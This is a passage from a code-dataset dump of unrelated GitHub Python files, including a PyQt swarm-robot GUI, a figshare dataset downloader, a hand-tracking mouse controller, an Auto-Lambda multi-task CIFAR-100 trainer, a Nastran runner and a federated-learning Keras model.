2)\n\t\tsend_pol_btn = QPushButton(\"send policy\")\n\t\tsend_pol_btn.clicked[bool].connect(self.upload_pol)\n\n\t\tcmd_grid.addWidget(send_pol_btn,3, 1, 1, 1)\n\t\tdisp_info_btn = QPushButton(\"disp info\")\n\t\tcmd_grid.addWidget(disp_info_btn,3, 0, 1, 1)\n\t\tcmd_group.setLayout(cmd_grid)\n\t\tgrid.addWidget(cmd_group, 1,0,1,1)\n\n\t\ttrail_group = QGroupBox(\"data collect\")\n\t\ttrail_group_grid = QGridLayout()\n\n\t\tcsv_name_edit = QLineEdit()\n\t\tcsv_name_edit.setPlaceholderText(\"CSV Name \")\n\t\tcsv_name_box = QHBoxLayout()\n\t\tcsv_name_box.addWidget(csv_name_edit)\n\t\tcsv_name_edit.returnPressed.connect(self.csv_rename)\n\t\tself.csv_name_edit = csv_name_edit\n\t\ttrail_group_grid.addWidget(self.csv_name_edit, 0,0,1,2)\n\t\t\n\t\tbegin_trial_btn = QPushButton(\"begin\")\n\t\tend_trial_btn = QPushButton(\"end\")\n\t\tself.idx_counter = QLabel(\"data idx: {}\".format(self.data_sock.data_idx))\n\n\t\tbegin_trial_btn.clicked[bool].connect(self.begin_trial)\n\t\tself.csv_num_el_edit = QLineEdit()\n\t\tself.csv_num_el_edit.setPlaceholderText(\"input # enteries\")\n\t\tself.csv_num_el_edit.returnPressed.connect(self.num_el_edit)\n\t\tself.num_els = 100\n\n\t\ttrail_group_grid.addWidget(begin_trial_btn, 1,0,1,1)\n\t\ttrail_group_grid.addWidget(end_trial_btn, 2,0,1,1)\n\t\ttrail_group_grid.addWidget(self.csv_num_el_edit, 1, 1, 1, 1)\n\t\ttrail_group_grid.addWidget(self.idx_counter,2, 1, 1,1)\n\t\ttrail_group.setLayout(trail_group_grid)\n\t\tgrid.addWidget(trail_group, 0,1,2,1)\n\n\t\tself.info_disp = QLabel(\"info:\")\n\t\tgrid.addWidget(self.info_disp, 3,0,1,2)\n\n\t\t# self.line_edit = QLineEdit()\n\t\t# enter_line = QPushButton(\"Enter\",self)\n\t\t# enter_line.clicked[bool].connect(self.transmit)\n\t\t# self.line_edit.returnPressed.connect(self.transmit)\n\t\t# liney = QHBoxLayout()\n\t\t# liney.addWidget(self.line_edit)\n\t\t# liney.addWidget(enter_line)\n\t\t# self.line_edit.setPlaceholderText(\"ex: ID CMD\")\n\t\t# grid.addLayout(liney, 1, 0, 1, 1)\n\n\t\tself.setWindowTitle('Swarm Interface')\n\t\tself.resize(500, 250)\n\t\tself.center()\n\t\tself.show()\n\n\tdef set_mach_id(self):\n\t\tself.curr_pack.set_mach_id(self.ID_edit.text())\n\t\tself.ID_edit.setPlaceholderText(self.ID_edit.text())\n\t\tself.info_disp.setText(\"curr bot: {}\".format(self.ID_edit.text()))\n\t\tself.ID_edit.setText(\"\")\n\n\tdef enable(self):\n\t\tsource = self.sender()\n\t\tself.curr_pack.set_cmd(\"enable\")\n\t\tif (source == self.enable_btns[0]):\n\t\t\tself.curr_pack.set_info(1)\n\t\t\ttxt = \"on\"\n\t\telif (source == self.enable_btns[1]):\n\t\t\tself.curr_pack.set_info(0)\n\t\t\ttxt = \"off\"\n\t\tself.data_sock.write_packet(self.curr_pack)\n\t\tself.info_disp.setText(\"turning bot {} {}\".format(self.curr_pack.mach_id, txt))\n\n\tdef upload_pol(self):\n\t\tprint(self.policy_combo_box.currentText())\n\t\tself.curr_pack.set_info(self.policy_combo_box.currentText())\n\t\tself.curr_pack.set_cmd(\"set_pol\")\n\t\tself.data_sock.write_packet(self.curr_pack)\n\n\tdef center(self):\n\t\tqr = self.frameGeometry()\n\t\t#print(qr)\n\t\tcp = QDesktopWidget().availableGeometry().center()\n\t\t#print(cp)\n\t\tqr.moveCenter(cp)\n\t\tself.move(qr.topLeft())\n\n\tdef csv_rename(self):\n\t\tself.data_sock.set_csv_name(self.csv_name_edit.text())\n\t\tself.csv_name_edit.setPlaceholderText(self.csv_name_edit.text())\n\t\tself.csv_name_edit.setText(\"\")\n\n\tdef begin_trial(self):\n\t\tself.data_sock.data_idx = 0\n\t\tser_read = threading.Thread(target=task1, args=[self.data_sock, self.num_els])\n\t\tser_read.start()\n\t\t# while(self.data_sock.data_idx < self.num_els):\n\t\t# \tprint(self.data_sock.data_idx)\n\t\t# \tself.data_sock.read()\n\t\t# \tself.idx_counter.setText(\"data idx: {}\".format(self.data_sock.data_idx))\n\n\t\t# self.data_sock.to_csv()\n\n\tdef num_el_edit(self):\n\t\tself.num_els = int(self.csv_num_el_edit.text())\n\t\tself.csv_num_el_edit.setPlaceholderText(str(self.num_els))\n\t\tself.csv_num_el_edit.setText(\"\")\n\t\tself.idx_counter.setText(\"data idx: {}/{}\".format(self.data_sock.data_idx, self.num_els))\n\nif __name__ == '__main__':\n\n\tapp = QApplication(sys.argv)\n\tex = UI()\n\t# ex.data_sock.ser.close()\n\tsys.exit(app.exec_())","repo_name":"JCohner/swarm_platform","sub_path":"interface/hub.py","file_name":"hub.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"29790521997","text":"\"\"\"\nDownloads files from https://figshare.com/authors/Kamal_Choudhary/4445539\n\"\"\"\n\nimport zipfile, os, requests\nfrom jarvis.db.jsonutils import loadjson\n\ndef datasets(dataset=''):\n if dataset == 'dft_2d':\n url = \"https://ndownloader.figshare.com/files/22471019\"\n js_tag = 'jdft_2d-4-26-2020.json'\n print ('Downloading 2D dataset ...')\n elif dataset == 'dft_3d':\n url = \"https://ndownloader.figshare.com/files/22471022\"\n js_tag = 'jdft_3d-4-26-2020.json' \n print ('Downloading 3D dataset ...')\n\n elif dataset == 'cfid_3d':\n url = \"https://ndownloader.figshare.com/files/22470818\"\n js_tag = 'jml_3d-4-26-2020.json' \n print ('Downloading 3D CFID dataset ...')\n else:\n ValueError('Dataset doesnt exist',dataset)\n return url, js_tag\n\n \n\ndef data(dataset='dft_2d') :\n url, js_tag = datasets(dataset)\n path = str(os.path.join(os.path.dirname(__file__),js_tag ))\n if not os.path.isfile(path):\n zfile = str(os.path.join(os.path.dirname(__file__), \"tmp.zip\"))\n r = requests.get(url)\n f = open(zfile, \"wb\")\n f.write(r.content)\n f.close()\n\n with zipfile.ZipFile(zfile, 'r') as zipObj:\n #zipObj.extract(path)\n zipObj.extractall(os.path.join(os.path.dirname(__file__)))\n os.remove(zfile)\n data = loadjson(path)\n return data\n\n\n\n\ndef get_ff_eneleast():\n jff1 = str(os.path.join(os.path.dirname(__file__), \"jff1.json\"))\n if not os.path.isfile(jff1):\n r = requests.get(\"https://ndownloader.figshare.com/files/10307139\")\n f = open(jff1, \"wb\")\n f.write(r.content)\n f.close()\n data_ff1 = loadjson(jff1)\n return data_ff1\n\n\n\n\"\"\"\nif __name__ == \"__main__\":\n\n data_2d = data(dataset='dft_2d')\n print('2d',len(data_2d))\n data_3d = data(dataset='dft_3d')\n print('3d',len(data_3d))\n data_ml = data(dataset='cfid_3d')\n print('cfid3d',len(data_ml))\n data_ff = get_ff_eneleast()\n print ('ff',len(data_ff))\n\"\"\"\n","repo_name":"knc6/jarvis-tools","sub_path":"jarvis/db/figshare.py","file_name":"figshare.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3469547251","text":"import autopy\nfrom HandTracking import HandTracking\nimport cv2\nimport numpy as np\nimport time \n\ncap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\nwCam = 1280\nhCam = 720\nrectangle = 200\nsmooth = 12\n\npTime = 0\nplocX, plocY = 0, 0\nclocX, clocY = 0, 0\n\ncap.set(3, wCam)\ncap.set(4, hCam)\ncount = 0\nhand = HandTracking(hands=1, detect_conf=0.7)\nwScr, hScr = autopy.screen.size()\nwhile True:\n success, img = cap.read()\n img = cv2.flip(img, 1)\n img = hand.detect_hand(img)\n lm_list = hand.get_positions(img)\n if lm_list:\n \n x1, y1 = lm_list[8][1:3]\n x2, y2 = lm_list[12][1:3]\n fingers = hand.fingers_up(img, lm_list)\n if fingers[1] == 1 and fingers[2] == 0:\n count = 0\n # Convert Coordinates\n x3 = np.interp(x1, (rectangle, wCam - rectangle), (0, wScr))\n y3 = np.interp(y1, (rectangle, hCam - rectangle), (0, hScr))\n # Smooth Values\n clocX = plocX + (x3 - plocX) / smooth\n clocY = plocY + (y3 - plocY) / smooth\n\n # Move q\n autopy.mouse.move(clocX, clocY)\n cv2.circle(img, (x1, y1), 15, (0, 255, 0), cv2.FILLED)\n plocX, plocY = clocX, clocY\n elif fingers[1] == 1 and fingers[2] == 1 and fingers[3] == 1:\n print(fingers)\n cv2.putText(img, 'Quitting', (10, 70), cv2.FONT_HERSHEY_PLAIN, 3, (0, 255, 0), 3)\n count += 1\n if count >= 60:\n break\n elif fingers[0] == 0 and fingers[1] == 1 and fingers[2] == 1:\n print(fingers)\n count = 0\n index = np.array(lm_list[8][1:3])\n middle = np.array(lm_list[12][1:3])\n distance = np.sqrt(np.sum((index - middle) ** 2))\n if distance < 40:\n cv2.circle(img, (x1, y1), 15, (0, 0, 255), cv2.FILLED)\n autopy.mouse.click()\n\n cv2.imshow('Image', img)\n if cv2.waitKey(1) == ord('q'):\n break","repo_name":"IvanYingX/Game_Vision","sub_path":"mouse_move.py","file_name":"mouse_move.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14880481524","text":"import argparse\nfrom audioop import mul\n\nimport torch.optim as optim\nimport torch.utils.data.sampler as sampler\n\nfrom auto_lambda import AutoLambda\nfrom create_network import *\nfrom create_dataset import *\nfrom utils import *\nimport problems\n\nimport betty\nfrom betty.configs import Config, EngineConfig\nfrom betty.engine import Engine\n\nfrom datetime import datetime\n\nparser = argparse.ArgumentParser(description='Multi-task/Auxiliary Learning: CIFAR-100')\nparser.add_argument('--mode', default='none', type=str)\nparser.add_argument('--port', default='none', type=str)\n\nparser.add_argument('--weight', default='equal', type=str, help='multi-task weighting: equal, dwa, uncert, autol')\nparser.add_argument('--gpu', default=0, type=int, help='gpu ID')\nparser.add_argument('--autol_init', default=0.1, type=float, help='initialisation for auto-lambda')\nparser.add_argument('--autol_lr', default=3e-4, type=float, help='learning rate for auto-lambda')\nparser.add_argument('--subset_id', default=0, type=int, help='domain id for cifar-100, -1 for MTL mode')\nparser.add_argument('--seed', default=0, type=int, help='random seed ID')\n\nopt = parser.parse_args()\n\ntorch.manual_seed(opt.seed)\nnp.random.seed(opt.seed)\nrandom.seed(opt.seed)\n\n# create logging folder to store training weights and losses\nif not os.path.exists('logging'):\n os.makedirs('logging')\ntime_str = datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\")\n\n# define model, optimiser and scheduler\ndevice = torch.device(\"cuda:{}\".format(opt.gpu) if torch.cuda.is_available() else \"cpu\")\nmodel = MTLVGG16(num_tasks=20).to(device)\ntrain_tasks = {'class_{}'.format(i): 5 for i in range(20)}\npri_tasks = {'class_{}'.format(opt.subset_id): 5} if opt.subset_id >= 0 else train_tasks\n\ntotal_epoch = 200\n\nif opt.weight == 'autol':\n params = model.parameters()\n meta_weight_ls = np.zeros([total_epoch, len(train_tasks)], dtype=np.float32)\n\nelif opt.weight in ['dwa', 'equal']:\n T = 2.0 # temperature used in dwa\n lambda_weight = np.ones([total_epoch, len(train_tasks)], dtype=np.float32)\n params = model.parameters()\n\nelif opt.weight == 'uncert':\n logsigma = torch.tensor([-0.7] * len(train_tasks), requires_grad=True, device=device)\n params = list(model.parameters()) + [logsigma]\n logsigma_ls = np.zeros([total_epoch, len(train_tasks)], dtype=np.float32)\n\noptimizer = optim.SGD(params, lr=0.1, weight_decay=5e-4, momentum=0.9)\nscheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, total_epoch)\n\n\n# define dataset\ntrans_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.5071, 0.4867, 0.4408], [0.2675, 0.2565, 0.2761]),\n])\n\ntrans_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize([0.5071, 0.4867, 0.4408], [0.2675, 0.2565, 0.2761]),\n])\n\ntrain_sets = CIFAR100Multiclass(root='dataset', train=True, transform=trans_train)\nif opt.subset_id == -1:\n test_sets = CIFAR100Multiclass(root='dataset', train=False, transform=trans_test)\nelse:\n test_sets = CIFAR100MTL(root='dataset', train=False, transform=trans_test, subset_id=opt.subset_id)\n\nbatch_size = 32\n\ntrain_loaders = torch.utils.data.DataLoader(dataset=train_sets, batch_size=batch_size, shuffle=True, num_workers=2)\n \n\n# a copy of train_loader with different data order, used for Auto-Lambda meta-update\nif opt.weight == 'autol':\n val_loaders = torch.utils.data.DataLoader(dataset=train_sets, batch_size=batch_size, shuffle=True, num_workers=2)\n\ntest_loaders = torch.utils.data.DataLoader(dataset=test_sets, batch_size=batch_size, shuffle=False, num_workers=2)\n\n\n# Train and evaluate multi-task network\nif opt.subset_id >= 0:\n print('CIFAR-100 | Training Task: All Domains | Primary Task: {} in Multi-task / Auxiliary Learning Mode with VGG-16'\n .format(test_sets.subset_class.title()))\nelse:\n print('CIFAR-100 | Training Task: All Domains | Primary Task: All Domains in Multi-task / Auxiliary Learning Mode with VGG16')\n\nprint('Applying Multi-task Methods: Weighting-based: {}'\n .format(opt.weight.title()))\n\ntrain_batch = len(train_loaders)\ntest_batch = len(test_loaders)\n\ntrain_metric = TaskMetric(train_tasks, pri_tasks, batch_size, total_epoch, 'cifar100')\nif opt.subset_id >= 0:\n test_metric = TaskMetric(train_tasks, pri_tasks, batch_size, total_epoch, 'cifar100')\nelse:\n test_metric = TaskMetric(train_tasks, pri_tasks, batch_size, total_epoch, 'cifar100', include_mtl=True)\n\nif opt.weight == 'autol':\n multitask_config = Config(type='darts', unroll_steps=1)\n reweight_config = Config(type='darts', unroll_steps=1, retain_graph=True)\n\n # lower level task\n multitask = problems.Multitask(\n name='multitask',\n module=model,\n optimizer=optimizer,\n train_data_loader=train_loaders,\n config=multitask_config,\n device=device,\n train_metric=train_metric\n )\n\n # loss weighting linear layer\n meta_module = nn.Linear(len(train_tasks), 1, bias=False, device=device)\n meta_module.weight.data.fill_(opt.autol_init)\n\n meta_optimizer = optim.Adam(meta_module.parameters(), lr=opt.autol_lr)\n\n # upper level task\n auto_lambda = problems.Reweight(\n name='auto_lambda',\n config=reweight_config,\n train_tasks=train_tasks,\n pri_tasks=pri_tasks,\n device=device,\n optimizer=meta_optimizer,\n module=meta_module,\n train_data_loader=val_loaders\n )\n\n engine_config = EngineConfig(\n train_iters=train_batch * total_epoch,\n valid_step=train_batch\n )\n\n u2l = {auto_lambda: [multitask]}\n l2u = {multitask: [auto_lambda]}\n dependencies = {'u2l': u2l, 'l2u': l2u}\n problems = [auto_lambda, multitask]\n\n class AutoLambdaEngine(Engine):\n def __init__(self, config, problems, scheduler_epoch, dependencies=None, env=None):\n super().__init__(config, problems, dependencies, env)\n # workaround to perform scheduler step once per epoch instead of every batch\n self.scheduler_epoch = scheduler_epoch\n def validation(self):\n self.scheduler_epoch.step()\n epoch = test_metric.epoch_counter\n train_str = self.multitask.train_metric.compute_metric(only_pri=True)\n self.multitask.train_metric.reset()\n\n # evaluating test data\n with torch.no_grad():\n if opt.subset_id >= 0:\n test_dataset = iter(test_loaders)\n for _ in range(test_batch):\n test_data, test_target = test_dataset.next()\n test_data = test_data.to(device)\n test_target = test_target.to(device)\n\n test_pred = self.multitask(test_data, opt.subset_id)\n test_loss = F.cross_entropy(test_pred, test_target)\n\n test_metric.update_metric([test_pred], {'class_{}'.format(opt.subset_id): test_target}, [test_loss])\n else:\n test_datasets = iter(test_loaders)\n for _ in range(test_batch):\n test_datas, test_targets = test_datasets.next()\n test_datas = [x.to(device) for x in test_datas]\n test_targets = {k: y.to(device) for k, y in test_targets.items()}\n\n test_pred = [self.multitask(test_data, t) for t, test_data in enumerate(test_datas)]\n test_loss = [compute_loss(test_pred[t], test_targets[task_id], task_id) for t, task_id in enumerate(test_targets)]\n\n test_metric.update_metric(test_pred, test_targets, test_loss)\n\n test_str = test_metric.compute_metric(only_pri=True)\n test_metric.reset()\n if opt.subset_id >= 0:\n print('Epoch {:04d} | TRAIN:{} || TEST:{} | Best: {} {:.4f}'\n .format(epoch, train_str, test_str, test_sets.subset_class.title(),\n test_metric.get_best_performance('class_{}'.format(opt.subset_id))))\n else:\n print('Epoch {:04d} | TRAIN:{} || TEST:{} | Best: All {:.4f}'\n .format(epoch, train_str, test_str, test_metric.get_best_performance('all')))\n\n meta_weight_ls[epoch] = self.auto_lambda.module.weight.data.detach().cpu()\n dict = {'train_loss': train_metric.metric, 'test_loss': test_metric.metric,\n 'weight': meta_weight_ls}\n\n class_names = train_sets.sets[0].class_dict.keys()\n print(get_weight_str_ranked(meta_weight_ls[epoch], list(class_names), 4))\n np.save('logging/mtl_cifar_{}_{}_{}_betty_{}.npy'.format(\n opt.subset_id, opt.weight, opt.seed, time_str\n ), dict)\n \n engine = AutoLambdaEngine(\n config=engine_config,\n problems=problems,\n dependencies=dependencies,\n scheduler_epoch=scheduler\n )\n\n engine.run()\n \nelse:\n for index in range(total_epoch):\n\n # apply Dynamic Weight Average\n if opt.weight == 'dwa':\n if index == 0 or index == 1:\n lambda_weight[index, :] = 1.0\n else:\n w = []\n for i, t in enumerate(train_tasks):\n w += [train_metric.metric[t][index - 1, 0] / train_metric.metric[t][index - 2, 0]]\n w = torch.softmax(torch.tensor(w) / T, dim=0)\n lambda_weight[index] = len(train_tasks) * w.numpy()\n\n # evaluating train data\n model.train()\n train_datasets = iter(train_loaders)\n for k in range(train_batch):\n train_datas, train_targets = next(train_datasets)\n train_datas = [x.to(device) for x in train_datas]\n train_targets = {k: y.to(device) for k, y in train_targets.items()}\n\n optimizer.zero_grad()\n\n train_pred = [model(train_data, t) for t, train_data in enumerate(train_datas)]\n train_loss = [compute_loss(train_pred[t], train_targets[task_id], task_id) for t, task_id in enumerate(train_targets)]\n\n if opt.weight in ['equal', 'dwa']:\n loss = sum(w * train_loss[i] for i, w in enumerate(lambda_weight[index]))\n\n if opt.weight == 'uncert':\n loss = sum(1 / (2 * torch.exp(w)) * train_loss[i] + w / 2 for i, w in enumerate(logsigma))\n\n loss.backward()\n optimizer.step()\n\n train_metric.update_metric(train_pred, train_targets, train_loss)\n\n train_str = train_metric.compute_metric(only_pri=True)\n train_metric.reset()\n\n # evaluating test data\n model.eval()\n with torch.no_grad():\n test_dataset = iter(test_loaders)\n if opt.subset_id >= 0:\n for k in range(test_batch):\n test_data, test_target = test_dataset.next()\n test_data = test_data.to(device)\n test_target = test_target.to(device)\n\n test_pred = model(test_data, opt.subset_id)\n test_loss = F.cross_entropy(test_pred, test_target)\n\n test_metric.update_metric([test_pred], {'class_{}'.format(opt.subset_id): test_target}, [test_loss])\n else:\n for k in range(test_batch):\n test_datas, test_targets = test_dataset.next()\n test_datas = [x.to(device) for x in test_datas]\n test_targets = {k: y.to(device) for k, y in test_targets.items()}\n\n test_pred = [model(test_data, t) for t, test_data in enumerate(test_datas)]\n test_loss = [compute_loss(test_pred[t], test_targets[task_id], task_id) for t, task_id in enumerate(test_targets)]\n test_metric.update_metric(test_pred, test_targets, test_loss)\n\n test_str = test_metric.compute_metric(only_pri=True)\n test_metric.reset()\n\n scheduler.step()\n class_names = train_sets.sets[0].class_dict.keys()\n\n if opt.subset_id >= 0:\n print('Epoch {:04d} | TRAIN:{} || TEST:{} | Best: {} {:.4f}'\n .format(index, train_str, test_str, test_sets.subset_class.title(),\n test_metric.get_best_performance('class_{}'.format(opt.subset_id))))\n else:\n print('Epoch {:04d} | TRAIN:{} || TEST:{} | Best: All {:.4f}'\n .format(index, train_str, test_str, test_metric.get_best_performance('all')))\n\n if opt.weight in ['dwa', 'equal']:\n dict = {'train_loss': train_metric.metric, 'test_loss': test_metric.metric,\n 'weight': lambda_weight}\n print(get_weight_str_ranked(lambda_weight[index], list(class_names), 4))\n\n if opt.weight == 'uncert':\n logsigma_ls[index] = logsigma.detach().cpu()\n dict = {'train_loss': train_metric.metric, 'test_loss': test_metric.metric,\n 'weight': logsigma_ls}\n print(get_weight_str_ranked(1 / (2 * np.exp(logsigma_ls[index])), list(class_names), 4))\n\n np.save('logging/mtl_cifar_{}_{}_{}_betty_{}.npy'.format(\n opt.subset_id, opt.weight, opt.seed, time_str\n ), dict)\n","repo_name":"pm3512/auto-lambda-betty","sub_path":"trainer_cifar_betty.py","file_name":"trainer_cifar_betty.py","file_ext":"py","file_size_in_byte":13255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31614011190","text":"import sys\nsys.path.append(\"../Modules\")\n\nfrom HPIB_plot import*\n\n\ndef getpd(df, trace):\n return df[trace][df[trace].columns[0]].to_numpy()\n\npath=\"C:/Users/Zucchi-Note/Dropbox/Cryochip/Medidas/TN2/231026/IdxVgs-231026 200848.csv\"\npath2=\"C:/Users/Zucchi/Documents/Medidas/teste/231028/csv/IdxVds-231028 144521.csv\"\n\ndf=pd.read_csv(path, header=[0, 1])\n\n\nVG=getpd(df, 'VG')\nID=getpd(df, 'ID')\n\nif 'gm' not in df.columns:\n gm=(np.diff(getpd(df,'ID').T)/np.diff(getpd(df,'VG').T)).T\n gm=np.append([gm[0]], gm)\n gm=[format(x, '.6e') for x in gm]\n\n header=pd.MultiIndex.from_product([['gm'],\n df['VG'].columns])\n\n df2=pd.DataFrame(data=gm, columns=header)\n df=pd.concat((df, df2), axis=1)\n\n df.to_csv(path, index=False, float_format='%.6e')\nelse:\n gm=getpd(df, 'gm')\n\nif 'dgm' not in df.columns:\n dgm=(np.diff(getpd(df,'gm').T)/np.diff(getpd(df,'VG').T)).T\n dgm=np.append(dgm, [dgm[-1]])\n dgm=[format(x, '.6e') for x in dgm]\n\n header=pd.MultiIndex.from_product([['dgm'],\n df['VG'].columns])\n\n df2=pd.DataFrame(data=dgm, columns=header)\n df=pd.concat((df, df2), axis=1)\n\n df.to_csv(path, index=False, float_format='%.6e')\nelse:\n dgm=getpd(df, 'dgm')\n\ndf.to_csv(path, index=False, float_format='%+.6e')\nVGfit=VG[np.argmax(gm)-2:np.argmax(gm)+3]\nIDfit=ID[np.argmax(gm)-2:np.argmax(gm)+3]\n\nm, b= np.polyfit(VGfit, IDfit, 1)\nVth=-b/m\nfitID=m*VG[:np.argmax(gm)]+b\n\nPlot(path, 'VG', ['ID', 'gm']) \n\nplt.show()\n","repo_name":"lszucchi/HPIB","sub_path":"Aux scripts/testplot.py","file_name":"testplot.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35346652502","text":"# coding=utf-8\nr\"\"\"Transformes a phrase-based OSM sequence to a token-based OSM sequence, keeps phrases together.\"\"\"\n\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser(description='PBOSM -> OSM conversion.')\nargs = parser.parse_args()\n\nSRC_POP1 = \"4\"\nSRC_POP2 = \"8\"\n\nfor pbosm in sys.stdin:\n pbosm = pbosm.strip().split()\n osm = []\n pop2_cnt = 0\n for op in pbosm:\n if op == SRC_POP2:\n pop2_cnt += 1\n elif op == SRC_POP1:\n osm.extend([SRC_POP1] * (pop2_cnt + 1))\n pop2_cnt = 0\n else:\n osm.append(op)\n osm.extend([SRC_POP1] * pop2_cnt)\n print(\" \".join(osm))\n\n","repo_name":"fstahlberg/ucam-scripts","sub_path":"t2t/pbosm2osm.py","file_name":"pbosm2osm.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"3394856778","text":"import os\nimport logging\nimport pickle\nimport tensorflow as tf\nfrom tensorflow.keras import layers, models\nfrom tensorflow.keras.utils import to_categorical\nimport numpy as np\ntf.keras.utils.set_random_seed(42)\n\nWEIGHTS_FOLDER = 'weights/'\nWEIGHTS_FILE_SUFFIX = '_weights.pickle'\nDATA_FOLDER = 'data/'\nDATA_FILE_SUFFIX = '_data.npz'\nTEST_PATH = 'data/test_data.npz'\nEPOCHS = 1\n\ndef _get_model():\n '''\n model = models.Sequential()\n model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(32, 32, 3)))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.MaxPooling2D((2, 2)))\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\n model.add(layers.Dropout(0.2))\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.Dropout(0.2))\n model.add(layers.Dense(10, activation='softmax'))\n '''\n model = models.Sequential()\n\n model.add(layers.Conv2D(32, (3,3), padding='same', activation='relu', input_shape=(32,32,3)))\n model.add(layers.BatchNormalization())\n model.add(layers.Conv2D(32, (3,3), padding='same', activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D(pool_size=(2,2)))\n model.add(layers.Dropout(0.3))\n\n model.add(layers.Conv2D(64, (3,3), padding='same', activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.Conv2D(64, (3,3), padding='same', activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.MaxPooling2D(pool_size=(2,2)))\n model.add(layers.Dropout(0.5))\n\n model.add(layers.Flatten())\n model.add(layers.Dense(64, activation='relu'))\n model.add(layers.BatchNormalization())\n model.add(layers.Dropout(0.5))\n model.add(layers.Dense(10, activation='softmax'))\n return model\n\ndef _encode_weights(weights):\n weights_bytes = pickle.dumps(weights)\n raw_weights = ''\n for byte in weights_bytes:\n raw_weights += str(byte) + ','\n return raw_weights[:-1]\n\ndef _decode_weights(raw_weights):\n byte_list = []\n for byte_str in raw_weights.split(','):\n byte_list.append(int(byte_str))\n weights_bytes = bytes(byte_list)\n return pickle.loads(weights_bytes)\n\ndef _save_weights(weights_path, weights):\n with open(weights_path, 'wb') as weights_file:\n pickle.dump(weights, weights_file)\n\ndef _read_weights(weights_path):\n weights = None\n if os.path.exists(weights_path):\n with open(weights_path, 'rb') as weights_file:\n weights = pickle.load(weights_file)\n else:\n weights = _get_model().get_weights()\n _save_weights(weights_path, weights)\n return weights\n\ndef get_weights(car_id):\n weights_path = WEIGHTS_FOLDER + car_id + WEIGHTS_FILE_SUFFIX\n weights = _read_weights(weights_path)\n return _encode_weights(weights)\n\ndef train(car_id, training_round):\n train_path = DATA_FOLDER + car_id + DATA_FILE_SUFFIX\n train_data = np.load(train_path)\n test_data = np.load(TEST_PATH)\n\n train_images, train_labels = train_data['images'], train_data['labels']\n test_images, test_labels = test_data['images'], test_data['labels']\n\n weights_path = WEIGHTS_FOLDER + car_id + WEIGHTS_FILE_SUFFIX\n weights = _read_weights(weights_path)\n\n model = _get_model()\n model.set_weights(weights)\n\n model.compile(optimizer='adam',\n loss=tf.keras.losses.categorical_crossentropy, metrics=['accuracy'])\n history = model.fit(train_images, train_labels, epochs=EPOCHS,\n validation_data=(test_images, test_labels), verbose=0)\n logging.warning('Node {}, Training Round {}, History {}'.format(car_id, training_round, history.history))\n\n _save_weights(weights_path, model.get_weights())\n\ndef merge(raw_weights, car_id):\n weights_path = WEIGHTS_FOLDER + car_id + WEIGHTS_FILE_SUFFIX\n weights = _read_weights(weights_path)\n\n received_weights = _decode_weights(raw_weights)\n\n for i in range(len(weights)):\n weights[i] = (weights[i] + received_weights[i]) / 2\n\n _save_weights(weights_path, weights)\n","repo_name":"Luizfrf3/veins-5.2","sub_path":"examples/veins/simplenet.py","file_name":"simplenet.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14832747476","text":"import subprocess\nfrom six import iteritems\nimport typing\n\n\ndef run_nastran(fname, nastran_cmd='nastran', keywords=None, run=True):\n # type: (str, Dict[str, str], bool) -> float\n \"\"\"\n Call a nastran subprocess with the given filename\n\n Parameters\n -----------\n fname : string\n Filename of the Nastran .bdf file\n keywords : dict/list of strings, optional\n Default keywords are `'scr=yes'`, `'bat=no'`, `'old=no'`, and `'news=no'`\n\n Returns\n -------\n return_code : int\n the nastran flag\n cmd_args : List[str]\n the nastran commands that go into subprocess\n \"\"\"\n if keywords is None:\n keywords_list = ['scr=yes', 'bat=no', 'old=no','news=no'] # 'mem=1024mb',\n else:\n if isinstance(keywords, (list, tuple)):\n keywords_list = keywords\n else:\n keywords_list = []\n for keyword, value in iteritems(keywords):\n if value is None:\n continue\n keywords_list.append('%s=%s' % (keyword, value))\n\n call_args = [nastran_cmd, fname] + keywords_list\n return_code = None\n if run:\n return_code = subprocess.call(call_args)\n return return_code, call_args\n\n","repo_name":"mtnakayama/pyNastran","sub_path":"pyNastran/utils/nastran_utils.py","file_name":"nastran_utils.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"13258260886","text":"import pandas as pd\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler, Normalizer\nfrom neupy import algorithms, estimators, environment, layers, architectures\nfrom sklearn import metrics\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.model_selection import cross_val_predict\n\ndf = pd.read_csv(\"OnlineNewsPopularity.csv\")\n\nheaders = df.columns[0:61]\n\n\n#remove recent news (less than 2 months)\ndf = df[df[' timedelta'] > 60]\n\n#Conduct PCA\n\n\ndata=df[df.columns[2:60]]\n\n\ntarget = 